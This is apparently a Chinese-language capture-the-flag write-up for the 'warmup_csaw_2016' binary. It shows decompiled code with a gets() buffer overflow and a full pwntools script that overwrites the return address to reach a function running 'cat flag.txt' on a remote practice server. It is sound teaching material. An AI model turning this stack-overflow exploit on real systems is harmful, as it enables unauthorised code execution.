64位,没有开启保护

    1. int __fastcall main(__int64 a1, char **a2, char **a3)
    2. {
    3.   char s; // [sp+0h] [bp-80h]@1
    4.   char v5; // [sp+40h] [bp-40h]@1
    6.   write(1, "-Warm Up-\n", 0xAuLL);
    7.   write(1, "WOW:", 4uLL);
    8.   sprintf(&s, "%p\n", sub_40060D);
    9.   write(1, &s, 9uLL);
    10.   write(1, ">", 1uLL);
    11.   return gets(&v5, ">");
    12. }

    get函数直接溢出到 sub_40060D 拿flag

    1. int sub_40060D()
    2. {
    3.   return system("cat flag.txt");
    4. }

    编写脚本

    1. from pwn import *
    3. context(os="linux", arch="amd64", log_level="debug")
    4. content = 0
    5. system_flag = 0x40060D
    7. def main():
    8.     if content == 1:
    9.         peiqi = process("warmup_csaw_2016")
    10.     else:
    11.         peiqi = remote("node3.buuoj.cn",28098)
    13.     payload = b'a' * (0x40 + 8)
    14.     payload = payload + p64(system_flag)
    16.     peiqi.recvuntil('>')
    17.     peiqi.sendline(payload)
    19.     peiqi.interactive()
    21. main()

    image.png